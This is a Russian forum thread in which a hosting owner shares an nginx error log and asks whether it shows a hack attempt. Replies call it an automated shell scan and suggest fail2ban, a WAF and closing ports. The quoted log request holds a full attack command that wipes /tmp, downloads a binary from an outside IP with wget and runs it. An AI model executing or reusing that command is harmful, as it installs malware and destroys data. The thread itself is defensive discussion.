@dfsaraev
Изучаю linux, немного html и css.

Ломают мой хостинг? Как защитить, основываясь на логах?

Доброго времени суток!
Увидел в логах вот такую строку:
2020/09/11 22:18:18 [error] 1693#1693: *2348 open() "/usr/share/nginx/html/shell" failed (2: No such file or directory), client: 197.56.189.213, server: localhost, request: "GET /shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1", host: "127.0.0.1:80"


Попытка взлома? Как пресечь и выявить первоисточник?
  • Вопрос задан
  • 613 просмотров
Решения вопроса 1
@algiraid
Как вариант - закрыть все не нужные порты, поставить антивирь с антималварем. Настроить по крону очистку папок, которые не нужны, раз в 5 секунд. Хонейспот при обнаружении get запросов от новых клиентов. Fail2ban. И регулярный аудит безопасности в режиме паранои.
З.Ы. вам повезло - только одна запись. Когда мне пытались взломать сайт в логах хостера было 60 попыток. Яндекс увидел 20 заходов.
Ответ написан
Пригласить эксперта
Ответы на вопрос 3
profesor08
@profesor08
Это просто автоматический скан на наличие шелла. Беспокоиться пока не о чем. Но если не спится спокойно, можешь перепроверить директории на наличие неизвестных и подозрительных файлов.
Ответ написан
sergey-gornostaev
@sergey-gornostaev
Седой и строгий
fail2ban
Ответ написан
Комментировать
Waf
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы